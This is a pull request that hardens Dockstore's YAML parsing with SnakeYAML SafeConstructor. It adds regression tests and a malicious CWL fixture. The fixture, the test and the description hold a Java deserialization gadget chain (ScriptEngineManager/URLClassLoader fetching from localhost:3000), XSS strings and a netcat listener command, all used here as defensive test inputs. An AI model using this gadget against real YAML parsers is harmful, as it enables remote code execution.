### PR TITLE
Use SnakeYAML SafeConstructor

### DIFF
--- a/dockstore-common/src/main/java/io/dockstore/common/yaml/DockstoreYamlHelper.java
+++ b/dockstore-common/src/main/java/io/dockstore/common/yaml/DockstoreYamlHelper.java
@@ -24,6 +24,7 @@ import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.yaml.snakeyaml.Yaml;
 import org.yaml.snakeyaml.constructor.Constructor;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
 import org.yaml.snakeyaml.introspector.Property;
 import org.yaml.snakeyaml.introspector.PropertyUtils;
 import org.yaml.snakeyaml.representer.Representer;
@@ -176,6 +177,9 @@ public final class DockstoreYamlHelper {
 
     private static <T> T readContent(final String content, final Constructor constructor) throws DockstoreYamlException {
         try {
+            // first check to make sure there aren't any unsafe types
+            final Yaml safeYaml = new Yaml(new SafeConstructor());
+            safeYaml.load(content);
             Representer representer = new Representer();
             representer.getPropertyUtils().setSkipMissingProperties(true);
             final Yaml yaml = new Yaml(constructor, representer);

--- a/dockstore-common/src/test/java/io/dockstore/common/yaml/DockstoreYamlTest.java
+++ b/dockstore-common/src/test/java/io/dockstore/common/yaml/DockstoreYamlTest.java
@@ -172,6 +172,29 @@ public class DockstoreYamlTest {
     }
 
     @Test
+    public void testMaliciousDockstore12() {
+        // This test will show its not added, but doesn't prove it was never run. To do that
+        // we need to set up a server that checks the classpath (or another payload with
+        // simpler side effects?)
+        try {
+            DockstoreYamlHelper.readAsDockstoreYaml12("version: 1.2\nworkflows: !!javax.script.ScriptEngineManager [\n"
+                    +
+                    "  !!java.net.URLClassLoader [[\n"
+                    +
+                    "    !!java.net.URL [\"https://localhost:3000\"]\n"
+                    +
+                    "  ]]\n"
+                    +
+                    "]\n");
+            fail("Dockstore yaml breaking entities should fail");
+        } catch (DockstoreYamlHelper.DockstoreYamlException e) {
+            assertTrue(e.getMessage().startsWith(DockstoreYamlHelper.ERROR_READING_DOCKSTORE_YML));
+            // This message is emitted when SafeConstructor is used
+            assertTrue(e.getMessage().contains("could not determine a constructor for the tag"));
+        }
+    }
+
+    @Test
     public void testMalformedDockstoreYaml() throws IOException {
         final String spec = "https://raw.githubusercontent.com/denis-yuen/test-malformed-app/c43103f4004241cb738280e54047203a7568a337/"
                 + ".dockstore.yml";

--- a/dockstore-webservice/src/main/java/io/dockstore/webservice/languages/CWLHandler.java
+++ b/dockstore-webservice/src/main/java/io/dockstore/webservice/languages/CWLHandler.java
@@ -417,14 +417,10 @@ public class CWLHandler extends AbstractLanguageHandler implements LanguageHandl
                     final Optional<SourceFile> sourceFileOptional = secondarySourceFiles.stream()
                             .filter(sf -> sf.getPath().equals(finalSecondaryFile)).findFirst();
                     final String content = sourceFileOptional.map(SourceFile::getContent).orElse(null);
-                    try {
-                        Yaml safeSecondaryYaml = new Yaml(new SafeConstructor());
-                        // This should throw an exception if there are unexpected blocks
-                        safeSecondaryYaml.load(finalSecondaryFile);
-                        stepDockerRequirement = parseSecondaryFile(stepDockerRequirement, content, gson, yaml);
-                    } catch (Exception e) {
-                        LOG.info("Secondary descriptor uses unsafe types");
-                    }
+                    Yaml safeSecondaryYaml = new Yaml(new SafeConstructor());
+                    // This should throw an exception if there are unexpected blocks
+                    safeSecondaryYaml.load(finalSecondaryFile);
+                    stepDockerRequirement = parseSecondaryFile(stepDockerRequirement, content, gson, yaml);
                     if (isExpressionTool(content, yaml)) {
                         stepToType.put(workflowStepId, expressionToolType);
                     } else if (isTool(content, yaml)) {
@@ -711,6 +707,7 @@ public class CWLHandler extends AbstractLanguageHandler implements LanguageHandl
                 // This should throw an exception if there are unexpected blocks
                 safeYaml.load(content);
             } catch (Exception e) {
+                LOG.info("An unsafe YAML could not be parsed.", e);
                 return false;
             }
             Map<String, Object> mapping = yaml.loadAs(content, Map.class);

--- a/dockstore-webservice/src/main/java/io/dockstore/webservice/languages/CWLHandler.java
+++ b/dockstore-webservice/src/main/java/io/dockstore/webservice/languages/CWLHandler.java
@@ -818,6 +818,8 @@ public class CWLHandler extends AbstractLanguageHandler implements LanguageHandl
                 safe = true;
             } catch (Exception e) {
                 isValid = false;
+                LOG.info("An unsafe YAML was attempted to be parsed");
+                validationMessage.append("CWL file is malformed or missing, cannot extract metadata: " + e.getMessage());
             }
             if (safe) {
                 Yaml yaml = new Yaml();

--- a/dockstore-webservice/src/main/java/io/dockstore/webservice/languages/LanguageHandlerInterface.java
+++ b/dockstore-webservice/src/main/java/io/dockstore/webservice/languages/LanguageHandlerInterface.java
@@ -159,6 +159,7 @@ public interface LanguageHandlerInterface {
                 try {
                     yaml.load(sourcefile.getContent());
                 } catch (YAMLException e) {
+                    LOG.error("There was an exception validating sourcefile", e);
                     validationMessageObject.put(sourcefile.getPath(), e.getMessage());
                     isValid = false;
                 }

--- a/dockstore-webservice/src/main/java/io/dockstore/webservice/languages/LanguageHandlerInterface.java
+++ b/dockstore-webservice/src/main/java/io/dockstore/webservice/languages/LanguageHandlerInterface.java
@@ -64,6 +64,7 @@ import org.apache.commons.lang3.tuple.Pair;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
 import org.yaml.snakeyaml.error.YAMLException;
 
 /**
@@ -154,7 +155,7 @@ public interface LanguageHandlerInterface {
         Map<String, String> validationMessageObject = new HashMap<>();
         for (SourceFile sourcefile : sourcefiles) {
             if (Objects.equals(sourcefile.getType(), fileType)) {
-                Yaml yaml = new Yaml();
+                Yaml yaml = new Yaml(new SafeConstructor());
                 try {
                     yaml.load(sourcefile.getContent());
                 } catch (YAMLException e) {

--- a/dockstore-webservice/src/test/java/core/CWLParseTest.java
+++ b/dockstore-webservice/src/test/java/core/CWLParseTest.java
@@ -19,9 +19,9 @@ import java.io.File;
 import java.io.IOException;
 import java.nio.charset.StandardCharsets;
 import java.util.HashSet;
+import static org.junit.Assert.assertEquals;
 
 import io.dockstore.common.DescriptorLanguage;
-import io.dockstore.common.yaml.DockstoreYamlHelper;
 import io.dockstore.webservice.core.Tag;
 import io.dockstore.webservice.core.Version;
 import io.dockstore.webservice.languages.LanguageHandlerFactory;
@@ -33,9 +33,6 @@ import org.junit.Rule;
 import org.junit.Test;
 import org.junit.contrib.java.lang.system.SystemErrRule;
 import org.junit.contrib.java.lang.system.SystemOutRule;
-
-import static org.junit.Assert.assertEquals;
-import static org.junit.Assert.fail;
 
 public class CWLParseTest {
 

--- a/dockstore-webservice/src/test/java/core/CWLParseTest.java
+++ b/dockstore-webservice/src/test/java/core/CWLParseTest.java
@@ -21,6 +21,7 @@ import java.nio.charset.StandardCharsets;
 import java.util.HashSet;
 
 import io.dockstore.common.DescriptorLanguage;
+import io.dockstore.common.yaml.DockstoreYamlHelper;
 import io.dockstore.webservice.core.Tag;
 import io.dockstore.webservice.core.Version;
 import io.dockstore.webservice.languages.LanguageHandlerFactory;
@@ -32,6 +33,9 @@ import org.junit.Rule;
 import org.junit.Test;
 import org.junit.contrib.java.lang.system.SystemErrRule;
 import org.junit.contrib.java.lang.system.SystemOutRule;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.fail;
 
 public class CWLParseTest {
 
@@ -101,6 +105,19 @@ public class CWLParseTest {
         Assert.assertEquals("incorrect author", "Peter Amstutz", entry.getAuthor());
         Assert.assertEquals("incorrect email", "peter.amstutz@curoverse.com", entry.getEmail());
         Assert.assertEquals("incorrect description", "Print the contents of a file to stdout using 'cat' running in a docker container.\nNew line doc.", entry.getDescription());
+    }
+
+    /**
+     * This tests a malicious CWL descriptor
+     * @throws IOException If file contents could not be read
+     */
+    @Test
+    public void testMaliciousCwl() throws IOException {
+        String filePath = ResourceHelpers.resourceFilePath("malicious.cwl");
+        LanguageHandlerInterface sInterface = LanguageHandlerFactory.getInterface(DescriptorLanguage.FileType.DOCKSTORE_CWL);
+        Version entry = sInterface.parseWorkflowContent(filePath, FileUtils.readFileToString(new File(filePath), StandardCharsets.UTF_8), new HashSet<>(), new Tag());
+        // This checks the version is not created but not that it was never parsed
+        assertEquals(entry.isValid(), false);
     }
 
     @Test

--- a/dockstore-webservice/src/test/java/core/CWLParseTest.java
+++ b/dockstore-webservice/src/test/java/core/CWLParseTest.java
@@ -15,11 +15,11 @@
  */
 package core;
 
-
 import java.io.File;
 import java.io.IOException;
 import java.nio.charset.StandardCharsets;
 import java.util.HashSet;
+import java.util.SortedSet;
 
 import io.dockstore.common.DescriptorLanguage;
 import io.dockstore.webservice.core.Tag;
@@ -28,8 +28,6 @@ import io.dockstore.webservice.core.Version;
 import io.dockstore.webservice.languages.LanguageHandlerFactory;
 import io.dockstore.webservice.languages.LanguageHandlerInterface;
 import io.dropwizard.testing.ResourceHelpers;
-
-import java.util.SortedSet;
 
 import org.apache.commons.io.FileUtils;
 import org.junit.Assert;

--- a/dockstore-webservice/src/test/java/core/CWLParseTest.java
+++ b/dockstore-webservice/src/test/java/core/CWLParseTest.java
@@ -15,11 +15,11 @@
  */
 package core;
 
+
 import java.io.File;
 import java.io.IOException;
 import java.nio.charset.StandardCharsets;
 import java.util.HashSet;
-import static org.junit.Assert.assertEquals;
 
 import io.dockstore.common.DescriptorLanguage;
 import io.dockstore.webservice.core.Tag;
@@ -114,7 +114,7 @@ public class CWLParseTest {
         LanguageHandlerInterface sInterface = LanguageHandlerFactory.getInterface(DescriptorLanguage.FileType.DOCKSTORE_CWL);
         Version entry = sInterface.parseWorkflowContent(filePath, FileUtils.readFileToString(new File(filePath), StandardCharsets.UTF_8), new HashSet<>(), new Tag());
         // This checks the version is not created but not that it was never parsed
-        assertEquals(entry.isValid(), false);
+        Assert.assertEquals(entry.isValid(), false);
     }
 
     @Test

--- a/dockstore-webservice/src/test/java/core/CWLParseTest.java
+++ b/dockstore-webservice/src/test/java/core/CWLParseTest.java
@@ -116,7 +116,7 @@ public class CWLParseTest {
         LanguageHandlerInterface sInterface = LanguageHandlerFactory.getInterface(DescriptorLanguage.FileType.DOCKSTORE_CWL);
         Version entry = sInterface.parseWorkflowContent(filePath, FileUtils.readFileToString(new File(filePath), StandardCharsets.UTF_8), new HashSet<>(), new Tag());
         // This checks the version is not created but not that it was never parsed
-        Assert.assertEquals(entry.isValid(), false);
+        Assert.assertEquals(false, entry.isValid());
         SortedSet<Validation> validations = entry.getValidations();
         Assert.assertTrue(validations.first().getMessage().contains("CWL file is malformed or missing"));
     }

--- a/dockstore-webservice/src/test/java/core/CWLParseTest.java
+++ b/dockstore-webservice/src/test/java/core/CWLParseTest.java
@@ -29,7 +29,7 @@ import io.dockstore.webservice.languages.LanguageHandlerFactory;
 import io.dockstore.webservice.languages.LanguageHandlerInterface;
 import io.dropwizard.testing.ResourceHelpers;
 
-import java.util.TreeSet;
+import java.util.SortedSet;
 
 import org.apache.commons.io.FileUtils;
 import org.junit.Assert;
@@ -119,7 +119,7 @@ public class CWLParseTest {
         Version entry = sInterface.parseWorkflowContent(filePath, FileUtils.readFileToString(new File(filePath), StandardCharsets.UTF_8), new HashSet<>(), new Tag());
         // This checks the version is not created but not that it was never parsed
         Assert.assertEquals(entry.isValid(), false);
-        TreeSet<Validation> validations = new TreeSet(entry.getValidations());
+        SortedSet<Validation> validations = entry.getValidations();
         Assert.assertTrue(validations.first().getMessage().contains("CWL file is malformed or missing"));
     }
 

--- a/dockstore-webservice/src/test/java/core/CWLParseTest.java
+++ b/dockstore-webservice/src/test/java/core/CWLParseTest.java
@@ -23,10 +23,14 @@ import java.util.HashSet;
 
 import io.dockstore.common.DescriptorLanguage;
 import io.dockstore.webservice.core.Tag;
+import io.dockstore.webservice.core.Validation;
 import io.dockstore.webservice.core.Version;
 import io.dockstore.webservice.languages.LanguageHandlerFactory;
 import io.dockstore.webservice.languages.LanguageHandlerInterface;
 import io.dropwizard.testing.ResourceHelpers;
+
+import java.util.TreeSet;
+
 import org.apache.commons.io.FileUtils;
 import org.junit.Assert;
 import org.junit.Rule;
@@ -115,6 +119,8 @@ public class CWLParseTest {
         Version entry = sInterface.parseWorkflowContent(filePath, FileUtils.readFileToString(new File(filePath), StandardCharsets.UTF_8), new HashSet<>(), new Tag());
         // This checks the version is not created but not that it was never parsed
         Assert.assertEquals(entry.isValid(), false);
+        TreeSet<Validation> validations = new TreeSet(entry.getValidations());
+        Assert.assertTrue(validations.first().getMessage().contains("CWL file is malformed or missing"));
     }
 
     @Test

--- a/dockstore-webservice/src/test/resources/malicious.cwl
+++ b/dockstore-webservice/src/test/resources/malicious.cwl
@@ -1,0 +1,44 @@
+#!/usr/bin/env cwl-runner
+
+id: "hello-world"
+label: "Simple hello world toola"
+class: Workflow
+cwlVersion: v1.0
+
+$namespaces:
+  dct: http://purl.org/dc/terms/
+  foaf: http://xmlns.com/foaf/0.1/
+
+dct:creator:
+  "@id": "http://orcid.org/0000-0001-9758-0176"
+  foaf:name: "<script>window.alert(3131)</script><h1>hi</h1>"
+  foaf:mbox: "javascript:window.alert('hi')"
+
+requirements:
+- class: DockerRequirement
+  dockerPull: !!javax.script.ScriptEngineManager [
+  !!java.net.URLClassLoader [[
+    !!java.net.URL ["https://localhost:3000"]
+  ]]
+]
+
+
+inputs:
+  template_file:
+    type: File
+    inputBinding:
+      position: 1
+
+  input_file:
+    type: File
+    inputBinding:
+      position: 2
+
+
+outputs:
+  output:
+    type: File
+    outputBinding:
+      glob: "helloworld.txt"
+
+baseCommand: ["bash", "/usr/local/bin/hello_world"]


### PR DESCRIPTION
**Description**

This PR addresses a security concern regarding deserializing YML. In some cases YML can be converted into Java types and lead to vulnerabilities. An example malicious YAML snippet that will load unsafe Java types:

```
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://localhost:3000"]
  ]]
]
```

An attacker could put a malicious JAR at the URL and gain remote code execution within the application container.

With SafeConstructor we receive an error message and exception like:

```
Unable to save the new version due to the following error(s): /test.cwl.yml: could not determine a constructor for the tag tag:yaml.org,2002:javax.script.ScriptEngineManager
 in 'string', line 1, column 1:
    !!javax.script.ScriptEngineManager [
    ^
```

We do YAML parsing in a few areas: CWL, .dockstore.yml, and test parameter files. This PR attempts to add guards by using a safe constructor if possible, or using the exception to stop any later unsafe parsing (in the case of CWL).

I was not extremely confident on the code paths in the CWL parse section and added guards to each usage of Yaml.load in case there are some I didn't see. Unlike the other two areas, there aren't exceptions thrown, but instead its `valid` status is set.

The tests only demonstrate that an exception is thrown or that an input isn't valid. They do not verify that parsing never occurred. I am manually testing that by running a local `netcat` during tests (`sudo nc -lvnp 3000`). SnakeYAML will read the above snippet and make a request to localhost:3000, which appears as some http1.1 bytes received from localhost in netcat.

Going forward, we should have a convention that any yaml readers are instantiated with SafeConstructor().

**Issue**

https://ucsc-cgl.atlassian.net/browse/SEAB-3534

Please make sure that you've checked the following before submitting your pull request. Thanks!

- [ x] Check that you pass the basic style checks and unit tests by running `mvn clean install`
- [ n/a] Follow the existing JPA patterns for queries, using named parameters, to avoid SQL injection
- [ x] Check the Snyk dashboard to ensure you are not introducing new high/critical vulnerabilities
- [ x] Assume that inputs to the API can be malicious, and sanitize and/or check for Denial of Service type values, e.g., massive sizes
- [ x] Do not serve user-uploaded binary images through the Dockstore API
- [ n/a] Ensure that endpoints that only allow privileged access enforce that with the `@RolesAllowed` annotation
- [ n/a] Do not create cookies, although this may change in the future
